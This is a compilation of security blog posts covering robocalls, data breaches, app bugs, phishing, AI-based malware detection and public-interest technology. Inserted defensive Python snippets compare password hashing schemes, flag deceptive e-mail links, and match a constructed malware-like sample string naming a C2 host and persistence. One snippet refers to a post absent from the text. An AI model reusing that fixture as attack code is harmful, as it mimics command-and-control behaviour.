It’s almost impossible not to feel anxious when receiving a robocall. Whether the calls are just annoying, or a cybercriminal uses the call to scam consumers out of cash or information, this scheme is a big headache for all. To combat robocalls, there has been an uptick in apps and government intervention dedicated to fighting this ever-present annoyance. Unfortunately, things don’t seem to be getting better — while some savvy users are successful at avoiding these schemes, there are still plenty of other vulnerable targets.

Falling into a cybercriminal’s robocall trap can happen for a few reasons. First off, many users don’t know that if they answer a robocall, they may trigger more as a result. That’s because, once a user answers, hackers know there is someone on the other end of the phone line and they have an incentive to keep calling. Cybercriminals also have the ability to spoof numbers, mimic voices, and provide “concrete” background information that makes them sound legitimate. Lastly, it might surprise you to learn that robocalls are actually perfectly legal. It starts to become a grey area, however, when calls come through from predatory callers who are operating on a not-so-legal basis.

While government agencies, like the Federal Communications Commission and Federal Trade Commission, do their part to curb robocalls, the fight to stop robocalls is far from over, and more can always be done. Here are some proactive ways you can say so long to pesky scammers calling your phone.

  1. There’s an app for that. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected.
  2. Let unknown calls go to voicemail. Unless you recognize the number, don’t answer your phone.
  3. Never share personal details over the phone. Unfortunately, there’s a chance that cybercriminals may have previously obtained some of your personal information from other sources to bolster their scheme. However, do not provide any further personal or financial information over the phone, like SSNs or credit card information.
  4. Register for the FCC’s “Do Not Call” list. This can help keep you protected from cybercriminals and telemarketers alike by keeping your number off of their lists.
  5. Consider a comprehensive mobile security platform. Utilize the call blocker capability feature from McAfee Mobile Security. This tool can help reduce the number of calls that come through.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Say So Long to Robocalls appeared first on McAfee Blogs.

4 Tips to Protect Your Information During Medical Data Breaches

As the companies we trust with our data become more digital, it’s important for users to realize how this affects their own cybersecurity. Take your medical care provider, for instance. You walk into a doctor’s office and fill out a form on a clipboard. This information is then transferred to a computer where a patient Electronic Health Record is created or added to. We trust that our healthcare provider has taken the proper precautions to safely store this data. Unfortunately, medical data breaches are on the rise with a 70% increase over the past seven years. In fact, medical testing company LabCorp just announced that it experienced a breach affecting approximately 7.7 million customers.

How exactly did this breach occur? The information was exposed as a result of an issue with a third-party billing collections vendor, American Medical Collection Agency (AMCA). The information exposed includes names, addresses, birth dates, balance information, and credit card or bank account information provided by customers to AMCA. This breach comes just a few days after Quest Diagnostics, another company who worked with AMCA, announced that they too experienced a breach affecting 11.9 million users.

Luckily, LabCorp stated that they do not store or maintain Social Security numbers and insurance information for their customers. Additionally, the company provided no ordered test, lab results, or diagnostic information to AMCA. LabCorp stated that they intend to provide 200,000 affected users with more specific information regarding the breach and offer them identity protection and credit monitoring services for two years. And after receiving information on the possible security compromise, AMCA took down its web payments page and hired an external forensics firm to investigate the situation.

Medical data is essentially nonperishable in nature, making it extremely valuable to cybercrooks. It turns out that quite a few security vulnerabilities exist in the healthcare industry, such as unencrypted traffic between servers, the ability to create admin accounts remotely, and disclosure of private information. These types of vulnerabilities could allow cybercriminals to access healthcare systems, as our McAfee Labs researchers discovered. If someone with malicious intent did access the system, they would have the ability to permanently alter medical images, use medical research data for extortion, and more.

Cybercriminals are constantly pivoting their tactics and changing their targets in order to best complete their schemes. As it turns out, medical data has become a hot commodity for cybercrooks. According to the McAfee Labs Threats Report from March 2018, the healthcare sector has experienced a 210% increase in publicly disclosed security incidents from 2016 to 2017. The McAfee Advanced Threat Research Team concluded that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

While medical care providers should do all that they can to ensure the security of their patients, there are steps users can take to help maintain their privacy. If you think your personal or financial information might be affected by the recent breaches, check out the following tips to help keep your personal data secure:

  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit. Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Be vigilant about checking your accounts. If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blogs.

Attention Graphic Designers: It’s Time to Secure Your Canva Credentials

Online graphic design tools are extremely useful when it comes to creating resumes, social media graphics, invitations, and other designs and documents. Unfortunately, these platforms aren’t immune to malicious online activity. Canva, a popular Australian web design service, was recently breached by a malicious hacker, resulting in 139 million user records compromised.

So, how was this breach discovered? The hacker, who goes by the name GnosticPlayers, contacted a security reporter from ZDNet on May 24th and made him aware of the situation. The hacker claims to have stolen data pertaining to 1 billion users from multiple websites. The compromised data from Canva includes names, usernames, email addresses, city, and country information.

Canva claims to securely store all user passwords using the highest standards via the bcrypt algorithm. Bcrypt is a strong, deliberately slow password-hashing algorithm; because hashing is one-way and each guess is expensive, it is difficult and time-consuming for hackers to crack. Additionally, each Canva password was salted, meaning that random data was added to each password before hashing so that identical passwords used across the platform don’t produce identical hashes. According to ZDNet, 61 million users had their passwords hashed with bcrypt, while 78 million users had their Gmail addresses exposed in the breach.
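The two hashing schemes contrasted in the Emuparadise and Canva posts, salted MD5 versus a salted, slow hash, can be compared directly. The Python below is an added example, not McAfee’s or either company’s code; since the standard library has no bcrypt, PBKDF2-HMAC-SHA256 with a high iteration count stands in for bcrypt’s cost factor, and the password and per-user salts are constructed for the demonstration.

```python
import hashlib
import hmac
import os
import time

SALT_BYTES = 16
PBKDF2_ITERATIONS = 100_000   # work factor, the analogue of bcrypt's cost parameter


def md5_salted(password, salt=None):
    """Salted MD5 as the Emuparadise breach describes: the per-user salt keeps
    identical passwords from hashing identically, but each guess is still cheap."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.md5(salt + password.encode()).hexdigest()
    return salt, digest


def pbkdf2_salted(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted slow hash (PBKDF2 standing in for bcrypt): same salting benefit,
    plus a tunable cost that makes every guess expensive for an attacker."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations).hex()
    return salt, digest


def verify(hash_func, password, salt, stored_digest):
    """Re-hash a login attempt with the stored salt and compare in constant time."""
    _, digest = hash_func(password, salt)
    return hmac.compare_digest(digest, stored_digest)


def guesses_per_second(hash_func, salt, guesses):
    """Measure how many password guesses per second hash_func allows on this machine."""
    start = time.perf_counter()
    for i in range(guesses):
        hash_func("guess%d" % i, salt)
    elapsed = time.perf_counter() - start
    return guesses / elapsed if elapsed > 0 else float("inf")


def cracking_speed_ratio():
    """How many times faster offline guessing is against salted MD5 than against
    the slow hash; the salt is the same constructed value for both measurements."""
    salt = b"\x00" * SALT_BYTES          # constructed fixed salt for a fair timing comparison
    fast = guesses_per_second(md5_salted, salt, 20_000)
    slow = guesses_per_second(pbkdf2_salted, salt, 5)
    return fast / slow


if __name__ == "__main__":
    password = "correct horse battery staple"   # constructed sample password
    # Two users with the same password get different salted digests.
    salt_a, md5_a = md5_salted(password)
    salt_b, md5_b = md5_salted(password)
    print("same password, different salted MD5 digests:", md5_a != md5_b)
    print("login check with stored salt:", verify(md5_salted, password, salt_a, md5_a))
    print("salted MD5 allows roughly %.0fx more guesses/second than PBKDF2" % cracking_speed_ratio())
```

The salt defeats precomputed tables and hides shared passwords in both schemes; only the slow hash also makes each individual guess costly, which is why salted MD5 is no longer considered sufficient.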

Canva has notified users of the breach through email and ensured that their payment card and other financial data is safe. However, even if you aren’t a Canva user, it’s important to be aware of what cybersecurity precautions you should take in the event of a data breach. Check out the following tips:

  • Change your passwords. As an added precaution, Canva is encouraging their community of users to change their email and Canva account passwords. If a cybercriminal got a hold of the exposed data, they could gain access to your other accounts if your login credentials were the same across different platforms.
  • Check to see if you’ve been affected. If you’ve used Canva and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential data breaches.
  • Secure your personal data. Use a security solution like McAfee Identity Theft Protection. If your information is compromised during a breach, Identity Theft Protection helps monitor and keep tabs on your data in case a cybercriminal attempts to use it.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Attention Graphic Designers: It’s Time to Secure Your Canva Credentials appeared first on McAfee Blogs.

Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns

Apps not only provide users with a form of entertainment, but they also help us become more efficient or learn new things. One such app is Game Golf, which comes as a free app, a paid pro version with coaching tools, or with a wearable analyzer. With over 50,000 downloads on Google Play, the app helps golfers track their on-course performance and use the data to help improve their game. Unfortunately, millions of golfer records from the Game Golf app were recently exposed to anyone with an internet connection, thanks to a cloud database lacking password protection.

According to researchers, this exposure consisted of millions of records, including details on 134 million rounds of golf, 4.9 million user notifications, and 19.2 million records in an activity feed folder. Additionally, the database contained profile data like usernames, hashed passwords, emails, gender, Facebook IDs, and authorization tokens. The database also contained network information for the company behind the Game Golf app, Game Your Game Inc., including IP addresses, ports, pathways, and storage information that cybercrooks could potentially exploit to further access the network. A combination of all of this data could theoretically provide cybercriminals with more information on the user, creating greater privacy concerns. Thankfully, the database was secured about two weeks after the company was initially notified of the exposure.

Although it is still unclear as to whether cybercriminals took a swing at this data, the magnitude of the information exposed by the app is cause for concern. Luckily, users can follow these tips to help safeguard their data:

  • Change your passwords. If a cybercriminal got a hold of the exposed data, they could easily gain access into other online accounts if your login credentials were the same across different platforms. Err on the side of caution and change your passwords to something strong and unique for each account.
  • Check to see if you’ve been affected. If you’ve used the Game Golf app and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential exposures.
  • Secure your online profiles. Use a security solution like McAfee Safe Connect to encrypt your online activity, help protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Game Golf Exposure Leaves Users in a Sand Trap of Data Concerns appeared first on McAfee Blogs.

3 Things You Need to Know About Summer Cybersecurity


The summer season is quickly approaching. Users will take to the skies, roads, and oceans to travel throughout the world for a fun family adventure. But just because users take time off doesn’t mean that their security should. So, with the season’s arrival, we decided to conduct a survey to better understand users’ cybersecurity needs, as well as help them leave their cybersecurity woes behind while having some fun in the sun. That’s why we asked our users what they are most concerned about during the summer, so we can help them protect what really matters. Let’s see what they had to say.

Sharing the Fun

When it comes to vacations, we’re constantly taking and sharing snaps of amazing memories. What we don’t plan on sharing is the metadata embedded in each photo that can give away more than we intended. In fact, from our research we found that people are 3x more likely to be concerned about their Social Security number being hacked than their photos. Given the risk a compromised SSN poses for the potential of identity theft, it’s no surprise that respondents were more concerned about it. However, to keep the summer fun secure, it’s also important to keep travel photos private and only share securely.

Flying Safely and Securely

From a young age, we have been taught to keep our Social Security number close to the chest, and this is evident in how we protect SSNs. As a matter of fact, 88% of people would be seriously worried if their Social Security number was hacked. The best way to keep a Social Security number secure this summer – don’t share it when purchasing plane tickets or managing travel reservations. All you need to provide is a credit card and passport.

Making Smartphone Security #1

While on the go, travelers are often keenly aware of how exposed they are physically when carrying around credit cards, passports, suitcases, gadgets and more. However, they also need to think about securing their digital life, particularly their handheld devices. To keep personal photos protected while traveling this summer season, smartphone security must be a top priority. With nearly 40% of respondents concerned about sensitive personal photos being hacked, jet setters need to be proactive about security, not reactive. In fact, we’re reminded of just how important this fact is as we enter the month of June, Internet Safety Month. Just like your laptop or router, it’s vital to protect the personal data stored within a smartphone.

In order to help you stay secure this season, let’s put your travel security knowledge to the test.


The post 3 Things You Need to Know About Summer Cybersecurity appeared first on McAfee Blogs.

3 Tips for Protecting Against the New WhatsApp Bug

Messaging apps are a common form of digital communication these days, with Facebook’s WhatsApp being one of the most popular options out there. The communication platform boasts over 1.5 billion users – who now need to immediately update the app due to a new security threat. In fact, WhatsApp just announced a recently discovered security vulnerability that exposes both iOS and Android devices to malicious spyware.

So, how does this cyberthreat work, exactly? Leveraging the new WhatsApp bug, hackers first begin the scheme by calling an innocent user via the app. Regardless of whether the user picks up or not, the attacker can use that phone call to infect the device with malicious spyware. From there, crooks can potentially snoop around the user’s device, likely without the victim’s knowledge.

Fortunately, WhatsApp has already issued a patch that fixes the problem, which means users will close the bug if they update their app immediately. But that doesn’t mean users shouldn’t still keep security top of mind now and in the future when it comes to messaging apps and the crucial data they contain. With that said, here are a few security steps to follow:

  • Flip on automatic updates. No matter the type of application or platform, it’s always crucial to keep your software up-to-date, as fixes for vulnerabilities are usually included in each new version. Turning on automatic updates will ensure that you are always equipped with the latest security patches.
  • Be selective about what information you share. When chatting with fellow users on WhatsApp and other messaging platforms, it’s important you’re always careful of sharing personal data. Never exchange financial information or crucial personal details over the app, as they can possibly be stolen in the chance your device does become compromised with spyware or other malware.
  • Protect your mobile phones from spyware. To help prevent your device from becoming compromised by malicious software, such as this WhatsApp spyware, be sure to add an extra layer of security to it by leveraging a mobile security solution. With McAfee Mobile Security being available for both iOS and Android, devices of all types will remain protected from cyberthreats.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post 3 Tips for Protecting Against the New WhatsApp Bug appeared first on McAfee Blogs.

The iOS Twitter Bug: 3 Tips to Protect Your Location Data

Many of us use social media to keep our family and friends up-to-date on our everyday lives. We don’t typically expect social media companies to keep their partners updated on our every move as well. But for some Twitter users, this is exactly the situation they’ve found themselves in. On Monday afternoon, the social media company disclosed a bug that resulted in some Twitter users’ locations being shared with an unnamed Twitter partner.

So, how exactly did this bug disclose the locations of certain Twitter users? The social network accidentally sent advertising partners location data for a process called real-time bidding. This process lets advertisers pay for space based on certain users’ locations. Twitter intended to remove the location data from what it sent to its partners but failed to do so. Affected users include those who had more than one Twitter account on an iOS device. If the user chose to share their precise location on one account, Twitter says it may have collected and shared data for the other account on the same mobile device even if that account had opted out of location sharing. Although the location data was “fuzzed” to only show a ZIP code or city, it is still unclear as to how long this location sharing took place.

According to Twitter, the location data was not retained by the partner and they have fixed the problem to ensure that it doesn’t happen again. And while affected users have already been notified by the social network, there are some steps users can take to help protect their data:

  • Turn off location services. While social media is meant for sharing, there is some information, like your location, that ought to be kept private. If a cybercriminal knows where you are at a specific point in time, they could potentially use that information to your disadvantage. Consider your overall privacy and opt out of sharing your location data with social media platforms.
  • Update, update, update. No matter what type of bug might be affecting a certain platform, it’s always crucial to keep your software up-to-date. Turning on automatic updates will ensure that you are always equipped with the latest patches and security fixes.
  • Use a comprehensive security solution. Using a solution like McAfee Total Protection helps to add an extra layer of security in case a bug does expose your device or data.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The iOS Twitter Bug: 3 Tips to Protect Your Location Data appeared first on McAfee Blogs.

Avoid a Security Endgame: Learn About the Latest “Avengers” Scam

Marvel Studio’s $2.2 billion box-office hit “Avengers: Endgame” has quickly risen to the second-highest grossing film of all time in its first two weekends. Not surprisingly, cybercriminals have wasted no time in capitalizing on the movie’s success by luring victims with free digital downloads of the film. How? By tempting users with security shortcuts so they can watch the film without worrying about spoilers or sold-out movie tickets.

When a victim goes to download the movie from one of the many scam sites popping up around the web, the streaming appears to begin automatically. What the user doesn’t know is that the footage being streamed is just from the movie’s trailer. Soon after, a message pops up stating that the user needs to create an account to continue with the download. The “free” account prompts the user to create a username and password in advance, which could potentially be useful for cybercriminals due to the common practice of password reuse. Once a victim creates an account, they are asked for billing information and credit card details in order to “verify location” and make sure the service is “licensed to distribute” the movie in the victim’s region. These crooks are then able to scrape the victim’s personal and financial data, potentially leading to online account hacks, stolen funds, identity theft, and more.

Luckily, Marvel fans can protect their online data to avoid a cybersecurity endgame by using the following tips:

  • Look out for potential scam activity. If it seems too good to be true, then it probably is. Be wary of websites promising free movie downloads, especially for movies that are still in theaters.
  • Shield your financial data. Be suspicious of “free downloads” that still require you to fill out billing information. If an unknown website asks for your credit card information or your bank account data, it’s best to avoid the site altogether.
  • Make sure your credentials are unique. With this scam, threat actors could use the login credentials provided by the victim to access their other accounts if they didn’t have a unique login. Avoiding username and password reuse makes it a lot harder for cybercriminals to hack into your other online accounts if they gain access to one.
  • Assemble a team of comprehensive security tools. Using a tool like McAfee WebAdvisor can help you avoid dangerous websites and links and will warn you in the event that you do accidentally click on something malicious.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Avoid a Security Endgame: Learn About the Latest “Avengers” Scam appeared first on McAfee Blogs.

Cyber Defense Magazine – May 2019 has arrived. Enjoy it!

Cyber Defense Magazine May 2019 Edition has arrived. We hope you enjoy this month’s edition, packed with over 160 pages of excellent content.


Cyber Defense eMagazine for May 2019


Pierluigi Paganini

(SecurityAffairs – Cyber Defense Magazine, hacking)

The post Cyber Defense Magazine – May 2019 has arrived. Enjoy it! appeared first on Security Affairs.

Using the Human Factor in Cyber Attacks

The human factor is fundamental to the success of a cyber attack; for this reason it is important to create a culture of cyber security within organizations.

Every day we see a large number of tools being deployed within enterprises and institutions to keep their environments more secure. Along with deploying these tools comes a set of responsibilities to ensure that the resources are used efficiently and effectively, producing the results expected by analysts, managers, and senior management. In a corporate environment we find tools such as Web Application Firewalls (WAF), Intrusion Prevention Services (IPS), antispam, antivirus, firewalls, web filters / application control, DLP (Data Loss Prevention), switches, routers, and so on. Each of these tools has its own characteristics and function within the corporate environment; when well configured, they produce results and metrics that help managers make decisions about environment/business growth, security improvements, and more.

In recent years there has been a significant increase in cyber attacks and attempts to exploit vulnerabilities; attackers increasingly study CVEs (Common Vulnerabilities and Exposures) and use that knowledge to try to exploit, break into and exfiltrate data from companies or individuals. When deploying a security tool within a company, attention must be paid to points that go beyond the implementation project, such as maintaining and updating the tool according to the manufacturer’s best practices. A very common error today, one that leaves many companies vulnerable to attack, is caring about the tool only during the implementation process; afterwards the points mentioned above, which require constant attention throughout the tool’s life cycle inside the company, are forgotten, leaving the environment susceptible to attacks and exploitation.

Some points that make environments vulnerable:

  • Old tools.
  • Outdated tools.
  • Poor resource management.
  • Human factor.

Of the points mentioned above, I would like to draw attention to the human factor. With technological growth, creating a culture of security policy in the day-to-day work of employees has become fundamental. Companies are investing more and more in lectures, training and workshops to reduce attacks or intrusions caused by the human factor. The human factor can be illustrated as follows: the attacker sends an email with a supposed advertisement or promotion containing a link that will direct the user to this “promotion”, when in fact it is a malicious link (this attack is called phishing); the user may be infected with some malware, and from that machine the attacker gains internal access and begins to make lateral movements in an attempt to exploit or compromise the company environment. Every day we see research published by tool makers showing that most of the attacks that occur still involve the human factor, that is, a user who is not prepared to identify some simple types of attack, such as phishing, and who can thereby compromise the entire security of the company.
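The lure described above, a link whose visible text or brand wording hides a different real target, can be checked mechanically on the receiving side before a user ever sees it. The following is an added example and not the author’s code; the trusted domain, the sample message and the helper names are constructed for illustration.

```python
"""Flag anchors in an HTML e-mail whose visible text disagrees with the real href.
Added example; all domains and the message below are constructed, not real."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the organisation considers its own (constructed for this example).
TRUSTED_DOMAINS = {"example-shop.com"}


class _AnchorCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> element."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registrable_domain(host):
    """Crude last-two-labels approximation of the registrable domain."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def host_of(text):
    """Host named by the visible text if it looks like a URL or domain, else None."""
    if not text or any(ch.isspace() for ch in text):
        return None
    candidate = text if "://" in text else "http://" + text
    host = urlparse(candidate).hostname
    return host if host and "." in host else None


def suspicious_links(html):
    """Return (href, text, reason) for every link a reviewer should look at."""
    parser = _AnchorCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        target = urlparse(href)
        if target.scheme and target.scheme not in ("http", "https"):
            findings.append((href, text, "non-web scheme"))
            continue
        target_host = target.hostname or ""
        # Visible text that itself names a domain must agree with the real target.
        shown_host = host_of(text)
        if shown_host and registrable_domain(shown_host) != registrable_domain(target_host):
            findings.append((href, text, "visible URL differs from real target"))
            continue
        # A trusted brand name in the text but a foreign target is the classic lure.
        for brand in TRUSTED_DOMAINS:
            if brand.split(".")[0] in text.lower() and registrable_domain(target_host) != brand:
                findings.append((href, text, "brand text points to untrusted domain"))
                break
    return findings


# Constructed sample message: one clean link followed by two lures.
SAMPLE_EMAIL = """
<p>Your order is ready. <a href="https://www.example-shop.com/orders">View order</a></p>
<p>Limited offer: <a href="http://login.example-shop.com.promo-deals.test/claim">
https://www.example-shop.com/promotion</a></p>
<p><a href="http://198.51.100.23/x">Example-Shop support</a></p>
"""

if __name__ == "__main__":
    for href, text, reason in suspicious_links(SAMPLE_EMAIL):
        print(f"{reason}: text={text!r} -> {href}")
```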

There are currently three commonly used types of phishing attack:

Mass-Scale Phishing: an attack where fraudsters cast a wide net of attacks that are not highly targeted.

Spear Phishing: tailor-made for a specific victim or group of victims using personal details.

Whaling: a specialized type of spear phishing that targets a “big” victim within a company, for example the CEO, CFO or another executive.

Below we have the anatomy of a phishing attack:

[Figure: anatomy of a phishing attack]

About the author: Zoziel Freire

Cyber Security Analyst; content writer for the portal www.infosectrain.com; malicious document analyst; CompTIA Security Analytics Professional; LPIC-3 Enterprise Linux Professional; CompTIA Cybersecurity Analyst. LinkedIn: https://www.linkedin.com/in/zozielfreire/

Pierluigi Paganini

(SecurityAffairs – Human Factor, cybersecurity)

Twitter: https://twitter.com/zoziel

The post Using the Human Factor in Cyber Attacks appeared first on Security Affairs.

Artificial Intelligence’s Deep Learning, A New Cybersecurity Tool?

Among machine learning developments, deep learning is a major technological breakthrough. With the development of deep learning, programs for enhanced image recognition technology and games including Pokemon Go have come to pass. Advances in artificial intelligence are likely to apply to anti-virus technology as well, rendering the currently anemic signature-based and heuristics-based antimalware obsolete. The reason is that cyber attacks are becoming more sophisticated, as cybercriminals also practice research and development.

For example, current cyber attacks use malware at a rate of 90% or more, and it is said that some attacks using malware are launched about once every five seconds. For attacks of this kind that allowed cybercriminals to break into the system, the time to break in was said to be within one minute. Under such circumstances, conventional malware detection technology, which lists and detects data on malware characteristics called signatures, is also limited: if new malware appears, it will not work unless a corresponding signature is provided.

In other words, malware without a signature is not detected, and it cannot be detected until the malware’s characteristics are grasped and a new signature is created. But can signatures evolve quickly enough to catch up with malware customized to its target? It has also been pointed out that cybercriminals create large amounts of malware to try to evade antivirus: by changing the content of the malware slightly and creating a large number of derived samples, they attempt to evade signature-based detection.
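The evasion just described, a lightly modified variant of a known sample, is easy to see by putting an exact-hash signature beside a content-similarity check. This is an added example, not code from the article: byte shingling with Jaccard similarity stands in for the fuzzy-hashing techniques vendors actually use, and the “samples” are constructed strings, not malware.

```python
"""Exact signature vs. content similarity on constructed stand-in samples.
Added example; SAMPLE/VARIANT/BENIGN are made-up byte strings, not real malware."""
import hashlib


def sha256_hex(data: bytes) -> str:
    """Exact-match signature: any single byte change yields a different digest."""
    return hashlib.sha256(data).hexdigest()


def byte_shingles(data: bytes, n: int = 4) -> set:
    """All n-byte windows of the content; a local edit disturbs only a few of them.
    (Production tools use fuzzy hashes such as ssdeep or TLSH for the same purpose.)"""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def jaccard(a: set, b: set) -> float:
    """Overlap of two shingle sets, from 0.0 (disjoint) to 1.0 (identical)."""
    union = a | b
    return len(a & b) / len(union) if union else 1.0


# Constructed stand-in for a known sample (repeated to mimic a file with structure).
KNOWN_SAMPLE = b"SAMPLE-A:" + b"read_config();connect(c2.invalid:4444);persist(run_key);" * 3
# Variant 1: a single byte changed.  Variant 2: eight bytes of padding inserted.
VARIANT_FLIP = KNOWN_SAMPLE.replace(b"4444", b"4445", 1)
VARIANT_PAD = KNOWN_SAMPLE[:40] + b"\x90" * 8 + KNOWN_SAMPLE[40:]
# Unrelated benign content that must not be flagged.
BENIGN = b"Quarterly report: revenue grew in all regions. " * 4

SIGNATURE_DB = {sha256_hex(KNOWN_SAMPLE)}      # what a signature list stores
KNOWN_SHINGLES = byte_shingles(KNOWN_SAMPLE)   # what a similarity index stores


def signature_match(data: bytes) -> bool:
    """True only for a byte-for-byte identical file."""
    return sha256_hex(data) in SIGNATURE_DB


def similarity_score(data: bytes) -> float:
    """How much of the known sample's content the file shares."""
    return jaccard(byte_shingles(data), KNOWN_SHINGLES)


def similarity_match(data: bytes, threshold: float = 0.6) -> bool:
    """Flags near-duplicates; the threshold trades false positives for coverage."""
    return similarity_score(data) >= threshold


if __name__ == "__main__":
    for name, blob in [("known", KNOWN_SAMPLE), ("flip", VARIANT_FLIP),
                       ("pad", VARIANT_PAD), ("benign", BENIGN)]:
        print(f"{name:6} signature={signature_match(blob)!s:5} "
              f"similarity={similarity_score(blob):.2f}")
```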

For these reasons, it has been pointed out that detection of malware with conventional antivirus functions has limitations. Therefore, more effective measures are needed, as the world is facing massive accessibility and sharing of information, all of which comes with risks:

Information leakage due to internal fraud

No matter how many security measures are taken with tools and systems, human-caused damage will not disappear. It is also reported that company staff handling information illegally use customers’ personal information. Abused information includes credit card numbers and security codes. If this is the conduct of a trusted corporate employee, the customer has no way to prevent it, and it also affects social trust.

Attack targeting smartphones and smartphone apps

There is an increasing number of cyber attacks aimed at smartphones and smartphone applications. There are also viruses that infect smartphones, and malicious apps that pose as seemingly convenient free apps while extracting information have been confirmed. If smartphones used exclusively for business are abused, the damage to the company can be enormous.

Unauthorized use of Internet banking and credit card information

One of the most noticeable forms of personal cyber damage is the theft of online banking and credit card information. Account-related information often leaks from virus-infected PCs and smartphone apps. Based on the stolen information, Internet banking and credit cards end up being abused.

Damage caused by ransomware

Among cybercrimes, the damage caused by ransomware, a type of malware, has been a topic in recent years. The typical pattern is that a PC the malware has invaded is rendered unusable and a ransom is demanded for restoring the information and system. For a company that deals in information, damage that takes important information hostage will be a great loss.

Damage caused by targeted attacks

A targeted attack refers to a cyber attack aimed at a specific company. A typical targeted attack is sending an email with a virus attached to employees and departments of the targeted IT companies. Unlike conventional spam emails, these are malicious because they cannot be distinguished from regular emails at first glance. Infection with a virus or malware interferes with the operation of the system.


The post Artificial Intelligence’s Deep Learning, A New Cybersecurity Tool? appeared first on .

Cybersecurity for the Public Interest

The Crypto Wars have been waging off-and-on for a quarter-century. On one side is law enforcement, which wants to be able to break encryption, to access devices and communications of terrorists and criminals. On the other are almost every cryptographer and computer security expert, repeatedly explaining that there's no way to provide this capability without also weakening the security of every user of those devices and communications systems.

It's an impassioned debate, acrimonious at times, but there are real technologies that can be brought to bear on the problem: key-escrow technologies, code obfuscation technologies, and backdoors with different properties. Pervasive surveillance capitalism -- as practiced by the Internet companies that are already spying on everyone -- matters. So do society's underlying security needs. There is a security benefit to giving access to law enforcement, even though it would inevitably and invariably also give that access to others. However, there is also a security benefit of having these systems protected from all attackers, including law enforcement. These benefits are mutually exclusive. Which is more important, and to what degree?

The problem is that almost no policymakers are discussing this policy issue from a technologically informed perspective, and very few technologists truly understand the policy contours of the debate. The result is both sides consistently talking past each other, and policy proposals -- that occasionally become law -- that are technological disasters.

This isn't sustainable, either for this issue or any of the other policy issues surrounding Internet security. We need policymakers who understand technology, but we also need cybersecurity technologists who understand -- and are involved in -- policy. We need public-interest technologists.

Let's pause at that term. The Ford Foundation defines public-interest technologists as "technology practitioners who focus on social justice, the common good, and/or the public interest." A group of academics recently wrote that public-interest technologists are people who "study the application of technology expertise to advance the public interest, generate public benefits, or promote the public good." Tim Berners-Lee has called them "philosophical engineers." I think of public-interest technologists as people who combine their technological expertise with a public-interest focus: by working on tech policy, by working on a tech project with a public benefit, or by working as a traditional technologist for an organization with a public benefit. Maybe it's not the best term -- and I know not everyone likes it -- but it's a decent umbrella term that can encompass all these roles.

We need public-interest technologists in policy discussions. We need them on congressional staff, in federal agencies, at non-governmental organizations (NGOs), in academia, inside companies, and as part of the press. In our field, we need them to get involved in not only the Crypto Wars, but everywhere cybersecurity and policy touch each other: the vulnerability equities debate, election security, cryptocurrency policy, Internet of Things safety and security, big data, algorithmic fairness, adversarial machine learning, critical infrastructure, and national security. When you broaden the definition of Internet security, many additional areas fall within the intersection of cybersecurity and policy. Our particular expertise and way of looking at the world is critical for understanding a great many technological issues, such as net neutrality and the regulation of critical infrastructure. I wouldn't want to formulate public policy about artificial intelligence and robotics without a security technologist involved.

Public-interest technology isn't new. Many organizations are working in this area, from older organizations like EFF and EPIC to newer ones like Verified Voting and Access Now. Many academic classes and programs combine technology and public policy. My cybersecurity policy class at the Harvard Kennedy School is just one example. Media startups like The Markup are doing technology-driven journalism. There are even programs and initiatives related to public-interest technology inside for-profit corporations.

This might all seem like a lot, but it's really not. There aren't enough people doing it, there aren't enough people who know it needs to be done, and there aren't enough places to do it. We need to build a world where there is a viable career path for public-interest technologists.

